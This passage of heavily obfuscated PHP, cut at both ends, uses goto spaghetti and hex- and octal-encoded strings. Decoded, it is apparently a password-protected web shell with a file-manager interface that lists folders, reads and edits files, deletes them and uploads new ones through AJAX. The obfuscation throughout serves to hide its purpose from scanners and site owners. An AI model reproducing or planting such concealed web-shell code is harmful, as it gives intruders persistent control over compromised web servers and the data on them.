\x41\121\167\124\x55\x77\x6d\104\101\x51\160\124\x49\x51\x2b\x44\x42\167\x43\115\144\130\64\106\152\103\x45\x4f\x67\167\117\127\103\111\115\x4c\x6c\153\x45\101\x4f\167\75\75"; goto Rb11s; QyvFK: $r2sBB[1] = array_map("\x73\x74\162\164\x6f\x6c\157\167\x65\x72", $r2sBB[1]); goto HZgVV; zWb09: unset($RYKLz); goto NDh8c; IaFCa: $W7YOX[13] = "\101\x72\x65\40\x79\157\165\40\x73\x75\x72\145\40\171\x6f\165\40\x77\x61\156\164\x20\164\x6f\40\x52\x65\155\157\166\x65\x20\164\150\x69\163\40\146\x69\x6c\x65"; goto PPFJc; MKE5J: $W7YOX[29] = "\116\145\x77\40\146\157\154\x64\x65\x72"; goto e1ALr; Y2zZp: $fZ6Lt[0] = "\x64\141\164\x61\x3a\x69\x6d\x61\x67\145\57\160\156\x67\x3b\142\141\x73\x65\x36\x34\54\151\126\x42\117\x52\x77\x30\113\107\147\x6f\x41\101\x41\101\x4e\123\x55\x68\x45\125\x67\101\101\x41\x42\101\x41\x41\101\101\121\103\x41\x59\x41\x41\101\101\x66\70\57\71\x68\x41\101\101\101\x72\60\154\105\121\126\x51\x34\x6a\142\130\124\x73\121\162\103\x4d\102\101\107\x34\x41\x78\117\x67\x6b\x36\x36\x75\142\x6a\65\103\x67\x35\x43\63\163\102\130\60\x53\x56\x4c\154\x33\115\160\x31\160\142\x37\67\x33\x63\x51\53\x6a\132\71\116\102\x63\104\x55\x6d\x78\104\x67\x2f\x33\x68\x49\117\123\117\x37\x79\101\121\x35\57\x36\132\163\x69\x79\63\x41\101\x6f\101\x30\161\x2b\161\x71\156\132\112\x41\x45\x41\122\121\154\x67\x35\65\x78\x7a\x4a\104\x6f\x44\57\63\x41\166\112\132\53\171\116\x41\x52\x4c\x50\146\125\102\x45\x4e\x67\x44\x4d\x65\67\x2f\x49\x41\121\x6f\122\127\124\144\116\143\172\x43\x7a\x32\62\x54\147\x2b\62\61\x49\144\x70\x4f\x42\x6f\x5a\156\65\x67\144\x54\115\131\106\116\x56\124\66\160\x4b\x56\x58\x31\153\x41\x57\132\x32\x72\x65\x74\66\x44\70\103\171\x67\x4c\x5a\164\154\x77\101\165\x41\111\x35\132\x77\x46\152\155\102\126\124\61\x62\x47\142\63\130\65\x38\x70\106\x73\154\130\141\x73\155\x6b\x76\101\110\66\x7a\65\67\x52\114\x46\141\x62\x32\101\101\101\101\101\x42\112\x52\125\65\x45\x72\x6b\112\x67\x67\x67\75\75"; goto MtI8Y; IBMtR: echo HVaJt(); goto jAP1W; fx10_: AcpST: goto y5XHf; OlhC8: $W7YOX[32] = "\102\162\x6f\167\163\x65\x20\x2e\56\x2e\40"; goto vaZTU; Rrwt3: $W7YOX[4] = "\x68\x6f\155\x65"; goto SYyoG; ECXX5: echo "\x3c\x21\x44\x4f\103\x54\x59\120\x45\40\x68\164\155\154\76\15\12\74\150\164\x6d\x6c\x3e\15\xa\x3c\x68\x65\141\x64\76\xd\12\x3c\x74\151\x74\x6c\145\x3e" . $W7YOX[22] . "\x3c\x2f\x74\151\x74\x6c\x65\76\15\xa\x3c\155\145\164\x61\x20\x63\x68\x61\x72\x73\145\x74\75\x22" . $OQWkJ . "\x22\76\xd\xa\74\154\151\156\153\x20\x68\162\x65\x66\75\42" . $fZ6Lt[12] . "\x22\x20\162\145\154\75\x22\x69\x63\157\x6e\x22\40\x74\171\160\x65\x3d\42\x69\x6d\141\147\x65\x2f\170\55\x69\143\157\156\x22\x20\x2f\76\xd\12\74\155\145\x74\141\x20\150\164\x74\x70\x2d\x65\161\165\x69\166\x3d\x22\x58\x2d\125\101\x2d\x43\x6f\155\160\x61\x74\x69\x62\154\x65\42\x20\143\157\156\x74\x65\156\164\x3d\42\x49\105\75\x65\144\147\145\42\76\15\12\x3c\x6d\x65\x74\x61\x20\x6e\x61\155\x65\75\42\166\151\145\x77\x70\x6f\x72\x74\x22\x20\143\x6f\156\x74\145\156\164\75\42\167\x69\144\164\150\x3d\x64\x65\x76\x69\x63\145\x2d\167\151\x64\x74\x68\54\40\151\156\151\x74\x69\x61\x6c\55\x73\x63\141\x6c\145\75\x31\x22\76\15\12" . hVaJt() . "\xd\12\74\163\164\x79\x6c\x65\x3e\xd\12\142\x6f\144\171\40\x7b\142\141\143\x6b\147\x72\157\165\x6e\x64\72\40\43\106\61\106\x31\106\61\x20\x6e\157\156\145\40\162\x65\160\145\x61\164\x20\x73\x63\x72\157\154\x6c\x20\60\x25\40\x30\x25\x3b\175\15\12\56\x55\163\x65\162\x49\143\x6f\x6e\x7b\142\141\143\x6b\x67\x72\x6f\165\156\x64\72\x75\162\x6c\x28\40" . $fZ6Lt[12] . "\51\x20\x6e\x6f\x2d\x72\x65\x70\145\141\164\40\154\145\146\164\x20\x63\x65\156\164\145\162\73\x70\x61\144\x64\x69\156\x67\72\40\65\160\x78\40\x30\40\65\160\x78\40\x32\60\x70\x78\73\175\xd\12\x2e\120\141\163\x73\111\x63\x6f\x6e\x7b\x62\x61\143\x6b\x67\162\x6f\x75\156\x64\x3a\165\162\154\x28\40" . $fZ6Lt[14] . "\51\x20\156\x6f\x2d\162\x65\160\145\x61\x74\40\154\x65\146\x74\x20\x63\145\x6e\x74\145\162\73\x70\141\144\x64\151\x6e\147\x3a\x20\x35\x70\x78\x20\60\40\65\x70\x78\40\62\60\x70\170\x3b\x7d\xd\12\x3c\x2f\163\x74\171\x6c\145\x3e\15\xa\x3c\x2f\x68\x65\141\144\x3e\xd\xa\x3c\142\157\144\171\x3e\15\12\74\x64\x69\166\40\143\x6c\141\163\163\75\x22\143\157\x6e\164\141\151\x6e\145\162\x22\76\xd\12\x20\x3c\x64\151\166\x20\x63\154\141\163\163\75\42\143\157\154\55\163\x6d\55\x34\40\x63\x6f\154\x2d\x73\155\55\x6f\146\146\163\145\x74\55\x34\42\x20\163\164\x79\154\145\75\x22\155\141\x72\x67\151\156\x2d\x74\157\x70\72\65\x30\160\x78\73\x22\x3e\15\12\11\11\x3c\x64\151\x76\x20\x63\x6c\x61\x73\x73\75\x22\167\x65\154\154\x22\40\163\x74\171\154\x65\75\x22\x62\141\143\x6b\147\x72\x6f\x75\156\144\x2d\143\x6f\154\x6f\162\72\x20\43\x46\x46\106\x3b\42\x3e\xd\xa\40\40\40\x20\x20\40\74\x6c\145\x67\145\156\144\76" . $W7YOX[22] . "\74\57\x6c\x65\x67\145\156\144\76\xd\12\x20\40\40\x20\74\x66\157\x72\155\x20\x61\x63\143\145\x70\164\55\143\x68\x61\x72\163\x65\x74\75\x22" . $OQWkJ . "\x22\40\x61\x63\x74\x69\157\x6e\x3d\x22\42\40\155\x65\164\x68\157\144\75\x22\160\157\x73\x74\42\76" . $mbVav . "\xd\xa\11\x9\x20\x20\40\40\40\40\40\40\40\x20\15\xa\40\x20\40\40\40\40\x20\40\40\40\40\40\x20\40\40\40\x20\x20\40\40\x3c\x64\x69\x76\40\x63\x6c\141\163\x73\75\42\x69\156\160\165\x74\55\147\x72\x6f\165\x70\42\x20\x73\x74\171\x6c\145\x3d\42\x6d\141\x72\x67\x69\x6e\x2d\x74\x6f\x70\72\61\x30\x70\x78\73\x22\76\xd\12\40\40\40\40\40\40\x20\40\40\x20\40\40\40\40\x20\x20\x20\x20\40\40\x20\x20\40\40\74\x73\x70\141\156\x20\x63\154\141\163\163\x3d\x22\151\x6e\160\165\x74\x2d\x67\x72\157\x75\160\x2d\x61\x64\x64\157\x6e\x22\x3e\74\x69\40\x63\154\x61\163\163\x3d\42\120\x61\x73\163\111\x63\x6f\x6e\x22\x3e\x3c\x2f\151\76\74\57\163\160\141\x6e\76\15\12\x20\x20\x20\40\40\x20\40\40\x20\x20\40\40\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\40\x3c\x69\x6e\x70\x75\164\x20\151\144\75\42\x70\x61\163\163\x77\157\162\144\42\x20\164\x79\x70\145\75\42\x70\141\x73\x73\167\x6f\162\x64\42\x20\x63\154\x61\163\163\x3d\x22\x66\157\162\155\x2d\143\157\156\164\x72\157\x6c\x22\40\x6e\x61\x6d\x65\x3d\42\160\x61\163\x73\x77\x6f\x72\144\x22\x20\x70\x6c\141\143\145\x68\x6f\x6c\144\x65\162\x3d\x22" . $W7YOX[25] . "\x22\76\15\12\40\40\40\x20\40\x20\x20\40\x20\40\40\40\x20\x20\40\40\x20\40\40\40\x3c\57\x64\x69\166\x3e\x20\x20\xd\xa\x9\x9\x9\11\11\xd\12\x20\x20\40\x20\x20\x20\x20\x20\x3c\x62\x75\164\164\157\x6e\40\143\x6c\141\x73\163\75\42\142\x74\156\x20\142\164\156\x2d\151\156\146\157\40\x62\x74\156\55\142\154\157\x63\153\x22\x20\163\164\x79\154\x65\x3d\x22\155\141\162\x67\151\x6e\x2d\164\x6f\x70\72\x31\x30\160\x78\x3b\42\40\x20\x74\x79\160\145\x3d\42\x73\x75\x62\155\x69\x74\x22\x3e" . $W7YOX[23] . "\x3c\57\x62\x75\164\x74\x6f\x6e\76\xd\xa\x20\40\40\x20\x3c\x2f\146\157\162\x6d\x3e\15\12\11\x20\x20\x20\40\74\57\x64\x69\166\x3e\15\12\x20\40\74\x2f\144\151\166\76\xd\xa\x3c\x2f\144\x69\166\x3e\xd\xa\xd\xa\xd\12\74\x2f\142\x6f\x64\171\x3e\15\12\74\x2f\x68\164\155\x6c\x3e"; goto jaEbi; IC8TL: echo "\47\54\xd\xa\x20\x20\x20\x20\x20\40\40\40\157\156\x50\x61\147\x65\103\x6c\x69\x63\x6b\72\x20\146\165\156\143\x74\x69\157\x6e\x20\x28\145\166\x65\x6e\164\x2c\40\x70\x61\x67\x65\x29\40\x7b\xd\12\40\40\x20\x20\40\x20\40\x20\40\40\40\40\44\x28\42\43\143\157\156\164\145\156\x74\42\51\56\x68\x74\155\154\50\x4c\157\141\144\151\156\x67\110\x74\155\x6c\51\73\xd\xa\x9\11\11\x24\x2e\x67\145\x74\x4a\x53\x4f\116\50\42\77\x74\x61\142\x6c\145\x26\x70\x61\x67\x65\75\42\53\x70\141\x67\145\x2b\42\x26\x61\154\x65\162\x74\75\42\x2b\x72\x65\x73\x75\x6c\164\x2e\141\x6c\145\x72\164\54\x20\x66\165\156\143\x74\151\157\x6e\x28\162\145\x73\x75\x6c\x74\51\x7b\40\44\50\x22\43\143\x6f\x6e\x74\145\x6e\164\x22\x29\56\150\164\x6d\x6c\x28\x72\x65\163\x75\x6c\x74\56\x74\141\x62\154\145\x29\x3b\40\44\50\x27\x23\x62\162\145\x61\x64\x63\x72\x75\x6d\x62\47\x29\x2e\x68\164\155\x6c\x28\162\x65\x73\165\154\164\x2e\x64\x69\x72\x48\164\x6d\x6c\x29\x3b\x20\x24\x28\x27\43\x61\154\145\162\164\x27\51\56\x68\x74\155\x6c\50\162\x65\x73\x75\154\164\56\141\x6c\x65\162\x74\x29\x3b\x7d\x29\x3b\x9\11\40\xd\xa\x20\x20\40\40\x20\x20\40\x20\x7d\15\xa\11\11\x7d\x29\x3b\xd\12\x9\x9\11\15\xa\x9\11\11\x7d\x29\73\xd\12\11\x9\11\xd\xa\15\12\x9\x20\x20\x20\x20\x66\x75\156\x63\x74\x69\x6f\x6e\x20\x73\x65\164\x43\x6f\x6f\x6b\151\145\50\x6b\x65\171\x2c\40\x76\x61\154\x75\x65\51\x20\x7b\xd\12\x20\40\40\x20\40\x20\40\x20\x20\x20\x20\40\x76\141\162\40\145\170\160\151\162\x65\163\40\x3d\40\156\x65\x77\40\104\x61\164\x65\50\x29\73\15\xa\x20\40\x20\x20\x20\40\40\x20\40\x20\40\40\145\170\x70\151\162\x65\163\56\163\x65\x74\124\151\x6d\x65\50\x65\x78\160\151\162\145\x73\56\x67\145\164\124\x69\155\145\x28\51\40\53\40\x28\x31\40\x2a\40\x32\64\x20\x2a\40\x36\x30\x20\52\x20\66\60\40\52\40\x31\60\x30\x30\x29\x29\x3b\xd\xa\x20\x20\40\40\40\40\40\x20\40\40\40\40\x64\157\x63\165\155\x65\x6e\164\x2e\143\x6f\157\153\x69\x65\40\x3d\40\153\x65\x79\x20\53\40\47\75\47\40\53\40\166\141\154\165\145\40\53\x20\x27\73\145\170\x70\151\x72\x65\163\75\x27\40\53\40\x65\x78\x70\x69\162\145\163\56\x74\x6f\125\x54\103\123\164\x72\151\156\x67\x28\51\73\xd\12\x20\40\40\40\40\x20\x20\x20\175\15\12\15\12\40\x20\40\40\x20\x20\x20\40\x66\x75\156\x63\x74\x69\x6f\x6e\x20\x67\145\164\103\x6f\157\153\151\x65\x28\153\x65\x79\x29\40\x7b\xd\12\40\x20\x20\x20\x20\40\x20\x20\40\x20\x20\x20\166\x61\162\40\x6b\145\171\x56\141\x6c\165\145\x20\75\40\144\x6f\143\165\x6d\x65\156\x74\56\x63\157\x6f\153\x69\145\56\155\141\164\143\x68\x28\x27\50\x5e\x7c\73\51\x20\x3f\x27\x20\53\x20\x6b\145\171\40\x2b\40\47\x3d\x28\x5b\x5e\73\x5d\x2a\51\x28\73\x7c\44\51\x27\51\73\15\xa\x20\x20\40\40\x20\40\40\x20\40\40\40\40\x72\145\x74\165\162\x6e\x20\x6b\145\171\126\x61\x6c\x75\145\x20\77\40\153\145\171\x56\x61\x6c\x75\145\133\x32\135\40\72\x20\x6e\165\154\x6c\73\xd\12\40\40\x20\x20\x20\40\40\x20\x7d\15\xa\x9\xd\xa\x9\x20\x20\40\x20\x20\40\146\165\x6e\x63\164\x69\157\x6e\40\145\163\143\141\160\145\x54\141\147\163\50\40\x73\164\x72\x20\51\40\173\15\12\11\11\x9\x20\x20\162\x65\164\165\162\x6e\40\123\x74\162\151\x6e\147\50\x20\x73\164\x72\x20\51\xd\xa\40\x20\x20\x20\40\40\40\40\x20\40\x20\x2e\x72\145\x70\x6c\x61\143\x65\50\x20\x2f\x26\57\147\x2c\40\47\x26\141\155\x70\x3b\47\40\51\15\12\40\x20\40\40\x20\x20\40\x20\40\x20\x20\56\162\x65\x70\x6c\x61\x63\145\x28\x20\57\x22\57\147\x2c\40\x27\46\161\x75\x6f\164\73\47\x20\51\xd\12\x20\x20\40\x20\40\40\40\40\40\40\40\56\x72\x65\160\154\141\x63\x65\x28\x20\57\x27\x2f\x67\54\40\x27\x26\43\63\71\x3b\x27\x20\51\xd\xa\x20\x20\x20\40\x20\40\x20\x20\40\x20\40\x2e\162\145\x70\154\141\x63\x65\x28\40\57\74\x2f\147\54\x20\x27\x26\154\164\x3b\x27\x20\51\15\xa\40\40\x20\40\40\x20\x20\40\x20\40\40\56\162\x65\x70\154\x61\143\x65\x28\40\x2f\x3e\57\147\54\40\x27\x26\x67\x74\x3b\x27\40\x29\73\xd\12\x9\x9\x20\40\40\175\15\xa\x9\11\40\x20\x20\15\xa\11\11\x20\x20\40\146\165\156\143\x74\x69\x6f\156\40\x72\x65\160\x6c\x61\x63\145\137\144\151\162\x28\40\x73\164\162\40\51\40\173\xd\12\11\11\11\x20\40\x72\x65\164\165\162\x6e\x20\123\164\162\151\x6e\x67\50\40\163\x74\162\40\51\56\x72\145\160\x6c\x61\x63\x65\x28\x20\47\57\57\x2f\x27\54\40\47\x2f\47\40\x29\56\162\x65\x70\154\x61\x63\145\x28\40\x27\57\x2f\47\x2c\x20\x27\x2f\x27\40\x29\x3b\40\15\xa\x9\11\x20\40\40\175\15\12\11\x9\40\x20\x20\xd\xa\11\x9\x20\40\40\x66\165\156\x63\164\151\157\x6e\40\x69\x73\x46\x69\x6c\x65\x28\x70\141\164\x68\156\141\155\x65\51\x20\173\15\xa\x9\11\x9\x20\40\x20\162\x65\x74\165\x72\x6e\40\x70\141\164\x68\156\x61\x6d\x65\56\x73\160\154\151\164\x28\47\x2f\x27\51\x2e\160\157\x70\50\x29\56\163\x70\x6c\151\164\x28\x27\56\47\51\x2e\154\145\x6e\147\164\150\x20\x3e\x20\x31\73\15\xa\11\11\x20\x20\x20\175\xd\12\11\11\40\x20\40\x66\x75\x6e\143\x74\x69\157\156\40\x69\163\104\151\x72\50\160\141\164\x68\x6e\x61\155\x65\51\40\173\40\x72\x65\164\165\162\156\40\41\x69\163\x46\x69\154\x65\50\x70\x61\x74\150\156\x61\x6d\x65\x29\x3b\x20\x7d\15\12\x9\15\12\x9\x9\11\x66\165\156\143\x74\x69\157\x6e\40\x67\145\164\103\157\156\164\x65\x6e\164\x28\165\x72\x6c\x2c\164\x79\160\145\x29\xd\xa\11\x9\x9\173\xd\12\x9\11\x9\x9\40\40\x73\x65\x74\x43\157\157\153\x69\x65\50\x27\165\x72\x6c\x27\x2c\40\165\162\154\51\73\15\12\x9\11\11\11\40\44\x28\x22\x23\x63\x6f\156\x74\x65\156\x74\x22\51\x2e\x68\164\155\154\x28\x4c\x6f\141\x64\151\156\147\x48\164\x6d\154\x29\x3b\15\12\x9\x9\x9\x9\x20\x20\165\x72\154\x20\75\40\162\145\160\x6c\x61\x63\145\137\144\x69\x72\50\x75\162\154\51\x3b\x20\xd\xa\x9\x9\x9\40\40\x20\40\x20\x20\44\56\147\x65\164\112\x53\117\x4e\x28\x22\x3f\x74\141\142\154\145\x26\x22\x2b\x75\162\x6c\54\40\x66\x75\x6e\x63\x74\x69\x6f\156\x28\144\x61\164\x61\51\x7b\15\12\11\x9\x9\x9\40\57\57\x20\40\x61\x6c\x65\x72\x74\50\42\77\164\x61\142\154\x65\x26\42\53\x75\x72\x6c\51\73\11\x9\11\x20\40\xd\12\x9\x9\40\40\40\40\40\40\x20\40\x20\x20\x24\x28\x22\43\143\157\x6e\x74\x65\x6e\x74\x22\x29\56\x68\x74\155\154\x28\x64\141\164\141\x2e\164\141\142\x6c\145\x29\x3b\xd\xa\11\x9\x9\40\40\40\40\40\40\44\50\x27\43\142\162\x65\141\144\143\162\165\x6d\142\47\51\56\150\x74\155\x6c\50\x64\x61\x74\x61\56\x64\151\162\x48\x74\155\154\x29\73\15\xa\11\x9\x9\11\x20\x20\x24\50\47\43\144\151\x72\111\156\x70\x75\164\x53\145\141\x72\x63\150\x27\x29\x2e\x76\141\154\50\x64\141\x74\141\56\144\151\x72\51\73\xd\xa\11\11\x9\x9\40\40\44\x28\42\43\x52\x65\163\165\x6c\164\x22\x29\56\150\164\x6d\x6c\x28\x64\x61\x74\x61\56\164\141\x62\154\x65\x29\x3b\15\12\x9\x9\x9\11\40\40\44\50\x27\x23\x64\151\x72\145\x63\x74\157\x72\171\47\x29\x2e\x76\x61\154\50\144\141\164\x61\x2e\144\x69\x72\51\73\xd\xa\11\x9\x9\x9\x20\x20\x24\50\47\x23\160\141\147\x69\156\x61\x74\151\x6f\x6e\47\x29\56\145\x6d\160\164\171\50\51\x2e\162\145\155\x6f\166\x65\x44\141\164\141\50\42\x74\167\142\x73\55\160\x61\x67\x69\x6e\x61\164\x69\x6f\156\42\51\56\x75\156\x62\151\x6e\x64\x28\42\x70\x61\147\x65\42\x29\x3b\xd\xa\11\11\11\x9\40\x20\44\x28\x27\x23\x61\154\145\x72\164\x27\x29\56\150\x74\x6d\154\50\144\141\164\141\x2e\141\154\x65\162\164\51\73\11\11\40\x20\15\xa\x9\11\40\40\x20\x20\x20\40\x20\40\44\x28\x27\43\160\x61\x67\x69\x6e\141\164\x69\157\x6e\x27\x29\x2e\164\x77\x62\x73\120\x61\x67\151\x6e\141\164\151\157\156\50\x7b\xd\xa\x20\x20\40\x20\40\40\x20\x20\40\40\40\x20\x20\40\x20\40\40\x20\40\x20\164\x6f\x74\x61\x6c\120\141\147\x65\x73\72\40\144\x61\x74\141\x2e\164\x6f\164\141\x6c\54\xd\12\x20\x20\40\x20\40\40\40\40\40\40\x20\40\x20\40\40\40\x20\x20\40\x20\166\151\x73\151\x62\154\145\120\141\147\x65\x73\x3a\x20\65\54\15\xa\x9\x9\x20\x20\40\x20\x20\x20\40\40\x20\x20\40\40\146\151\x72\163\x74\x20\x3a\x20\47"; goto AJYQv; saSNv: echo $W7YOX[30]; goto txppW; Jxbaz: echo $fZ6Lt[3]; goto sdF2O; fcKMt: RJ1gE: goto N_XLk; zZ5uR: $BsWPo[0] = $_GET["\x73\x65\141\x72\143\150"]; goto nhP3x; fDLzy: q6CMN: goto GFr7S; SYyoG: $W7YOX[5] = "\106\x69\x6c\x65\156\x61\155\145"; goto f8NX8; Mmmw0: unset($_SERVER); goto t47Jt; ynK_u: echo "\74\57\143\145\156\164\145\x72\76\74\57\154\x69\x3e\47\x29\x3b\x9\x9\11\x20\x20\x20\xd\xa\x9\x9\11\40\x20\x20\x24\56\147\x65\164\50\x22\77\x6c\x69\x73\x74\x46\157\x6c\x64\x65\162\106\x69\x6c\145\163\x26\144\x69\x72\x3d\42\x2b\x64\151\x72\54\x20\146\x75\x6e\143\164\151\157\156\x28\x64\141\x74\x61\51\173\15\12\x9\11\x9\40\x20\40\40\x20\x20\x24\50\x22\x23\154\151\x73\x74\106\x6f\154\144\145\x72\x46\151\154\145\163\42\51\x2e\150\x74\155\x6c\50\144\141\x74\x61\51\73\xd\xa\x9\40\40\x20\x20\x20\40\40\40\40\x20\40\40\x20\x20\x24\50\x27\x2e\164\162\145\x65\x76\x69\145\167\47\x29\x2e\x74\x72\145\145\x76\x69\x65\167\50\x29\x3b\xd\xa\40\x20\40\x20\xd\12\x9\x9\x9\40\40\x20\175\x29\x3b\xd\xa\xd\12\11\11\x20\40\xd\xa\11\11\x9\x9\11\x72\x65\x74\x75\x72\x6e\73\xd\xa\x9\11\11\175\x3b\15\12\11\x9\11\xd\12\11\x9\x9\x20\40\40\40\151\x66\50\40\44\x2e\x69\156\x41\x72\x72\141\171\50\x67\x65\164\105\x78\164\x28\x66\x69\154\145\x6e\141\155\145\51\54\x20\111\155\147\x54\171\x70\145\x73\x20\x20\x29\x21\x3d\75\x2d\x31\x29\15\xa\11\x9\11\x9\x7b\xd\xa\x9\11\x9\11\11\x24\50\x22\43\122\x65\163\x75\x6c\x74\x22\x29\56\x68\x74\155\154\50\x27\x3c\x63\145\x6e\x74\x65\x72\x3e\x3c\x62\x72\76\x3c\151\x6d\147\40\163\x72\143\75\42\47\53\144\x69\162\x2b\x27\42\40\143\154\x61\x73\x73\x3d\x22\151\x6d\x67\55\x72\157\165\x6e\144\145\x64\x20\x69\x6d\x67\x2d\x72\145\x73\x70\157\x6e\163\x69\166\x65\42\x20\x61\154\164\x3d\x22\x22\76\74\57\x63\x65\156\x74\x65\162\x3e\x27\x29\73\x20\xd\12\x9\11\11\11\11\162\x65\x74\x75\x72\x6e\x3b\xd\xa\x9\x9\11\x9\175\73\xd\xa\11\11\11\x9\x9\15\xa\x9\x9\x9\x9\x9\15\12\x9\x9\11\11\x69\x66\50\40\44\56\151\156\101\x72\162\141\x79\50\147\x65\164\105\x78\x74\50\x66\x69\x6c\145\x6e\141\x6d\145\51\54\40\x46\151\154\145\x54\171\x70\x65\x73\x20\x20\51\41\75\x3d\55\61\40\174\174\40\x46\151\154\x65\x54\171\x70\145\x73\56\154\145\x6e\147\164\150\40\x3d\x3d\x30\x20\x29\x20\x7b\xd\12\x9\11\x9\x9\xd\xa\11\11\x9\x9\11\44\56\147\145\164\50\42\77\x72\145\x61\x64\x3d\42\53\x64\x69\162\x2c\40\146\165\156\143\x74\151\157\156\x28\162\x65\163\165\x6c\x74\51\173\40\15\xa\11\x9\x9\x9\x9\40\44\x28\42\x23\x46\151\x6c\x65\127\162\151\x74\145\102\x74\156\42\51\56\163\150\x6f\167\x28\51\x3b\15\xa\x9\x9\11\11\x9\x20\x24\50\x27\43\106\x69\154\x65\127\x72\x69\x74\x65\114\141\x62\145\154\x73\165\143\x63\145\163\163\47\x29\x2e\150\x74\155\154\50\47\x27\x29\x3b\xd\xa\x20\x20\x20\40\40\40\x20\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\x20\40\x20\44\x28\42\43\x46\x69\x6c\x65\x57\x72\151\164\x65\102\164\x6e\42\x29\56\162\x65\155\157\x76\x65\101\164\164\162\50\42\x64\x69\163\141\142\154\145\x64\x22\51\x3b\xd\12\40\x20\40\40\40\x20\40\40\x20\x20\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\x24\50\x22\x23\122\x65\x73\x75\154\164\x22\x29\x2e\x68\x74\155\x6c\x28\x27\x3c\x69\156\x70\x75\164\40\x69\x64\x3d\42\x46\151\x6c\x65\124\170\x74\x5f\117\x4b\42\40\x74\x79\160\x65\75\42\x68\151\144\x64\x65\156\x22\40\x3e\x3c\164\145\170\164\x61\162\145\x61\40\x69\144\x3d\42\x46\151\x6c\x65\124\x78\x74\x22\40\x63\154\x61\x73\163\x3d\x22\x66\x6f\x72\155\x2d\143\157\x6e\164\162\x6f\154\x22\40\x72\x6f\x77\163\x3d\42\x31\65\x22\x20\x73\164\171\154\x65\x3d\42\x62\157\x72\144\145\x72\55\x74\157\x70\72\40\60\160\170\x20\73\x20\x62\x6f\x78\x2d\x73\150\141\x64\x6f\x77\72\40\151\x6e\163\x65\164\x20\60\40\60\160\170\40\61\160\x78\40\162\x67\142\141\x28\60\54\60\54\60\54\x2e\x30\x37\x35\x29\x3b\x62\x6f\x72\144\x65\x72\x2d\x74\x6f\x70\55\x6c\145\x66\164\x2d\162\x61\x64\x69\x75\x73\x3a\x20\60\x70\x78\73\x20\x22\76\x27\x2b\145\163\143\141\160\x65\124\x61\147\163\50\x72\145\x73\x75\154\164\51\x2b\47\74\57\164\145\170\x74\141\x72\145\x61\x3e\47\x29\73\x20\xd\xa\x9\x9\x9\x9\x9\175\x29\x3b\11\15\12\x9\11\11\x9\x9\162\x65\164\165\x72\x6e\x3b\15\12\x9\x9\x9\11\175\x3b\15\12\x9\11\11\11\xd\xa\11\11\11\11\11\15\12\x9\11\x9\11\x9\11\xd\12\11\x9\x9\x20\175\73\15\12\x9\x9\x9\x20\15\xa\11\11\11\40\15\xa\x9\x9\11\x20\xd\xa\x9\11\x9\40\146\x75\156\143\x74\x69\157\x6e\40\x77\162\x69\164\x65\x41\156\144\x43\x6f\156\x74\145\156\x74\50\51\40\xd\12\11\11\x9\40\173\40\xd\12\x9\x9\x9\40\15\12\11\x9\11\x20\x20\x69\x66\50\x20\41\44\x28\x27\x23\x46\x69\154\x65\124\170\x74\x5f\117\x4b\47\51\56\154\145\x6e\x67\x74\150\40\51\x20\173\44\x28\42\x23\106\x69\x6c\145\x57\x72\151\x74\145\102\x74\156\x22\x29\x2e\x61\x74\x74\x72\50\42\144\x69\x73\x61\142\x6c\145\x64\x22\54\x20\42\144\151\x73\x61\x62\154\x65\x64\x22\51\x3b\40\x24\x28\x27\43\x46\x69\154\x65\127\162\151\164\145\114\141\142\x65\154\163\165\143\143\145\x73\163\x27\51\x2e\150\x74\x6d\154\50\x27"; goto Fdge4; xwSzc: unset($x5bhU); goto Px_q8; Z3YDp: echo "\x27\51\x3b\x9\x20\xd\xa\11\x9\44\50\42\43\106\151\x6c\145\x55\160\x6c\157\141\144\x42\164\156\x22\51\56\x61\x74\x74\x72\x28\x22\144\151\163\141\x62\154\145\x64\x22\54\x20\42\x64\151\163\141\x62\154\x65\144\42\51\x3b\xd\12\x20\40\40\40\40\40\40\40\145\x2e\160\x72\x65\x76\x65\x6e\x74\104\x65\146\x61\x75\x6c\x74\50\x29\x3b\xd\12\x20\40\40\40\40\x20\40\x20\x76\x61\162\40\146\157\x72\x6d\x44\141\164\141\40\75\40\156\145\x77\x20\x46\x6f\162\x6d\x44\x61\164\x61\x28\x74\x68\151\163\x29\73\15\12\40\x20\x20\40\40\40\40\x20\166\141\x72\x20\x64\x69\x72\x20\x3d\x24\50\x27\x23\x55\160\x6c\157\141\x64\x46\x69\154\145\104\x69\x72\47\51\x2e\x76\141\x6c\50\51\x3b\xd\12\x20\40\x20\40\x20\40\40\x20\44\56\141\x6a\x61\x78\50\x7b\15\12\x9\11\x9\170\x68\x72\x3a\x20\x66\x75\x6e\x63\164\x69\157\156\x28\x29\xd\xa\11\x9\11\173\15\xa\11\x9\11\x9\166\x61\162\40\170\x68\162\40\75\x20\156\145\x77\40\x77\151\x6e\x64\157\x77\x2e\x58\115\114\110\164\x74\160\122\x65\161\x75\x65\163\164\x28\51\x3b\15\xa\11\11\x9\x9\x78\x68\x72\56\165\x70\x6c\x6f\141\144\x2e\x61\144\144\x45\x76\x65\156\164\x4c\151\x73\x74\x65\156\145\162\50\x22\x70\x72\x6f\147\x72\145\163\163\42\54\40\x66\165\x6e\x63\164\151\157\x6e\x28\x65\166\164\x29\x20\x7b\xd\xa\x9\x9\11\11\11\151\146\40\x28\x65\x76\164\56\x6c\x65\x6e\147\x74\x68\103\157\155\x70\165\164\141\x62\154\145\51\x20\173\15\12\11\x9\11\x9\11\x9\166\141\x72\40\x70\x65\162\x63\x65\x6e\164\103\157\155\x70\x6c\x65\x74\x65\x20\75\x20\115\x61\164\150\56\162\157\165\156\144\50\x65\x76\164\56\x6c\157\141\x64\145\144\x20\x2a\40\x31\60\x30\x20\x2f\x20\145\x76\x74\x2e\164\x6f\164\141\154\51\73\15\xa\11\11\11\11\x9\11\x24\x28\x27\43\106\x69\154\145\x55\x70\154\157\141\144\x4c\x61\142\145\154\x73\x75\143\143\145\x73\x73\x27\51\x2e\x68\x74\155\154\x28\x27"; goto KysTr; KKoyg: echo 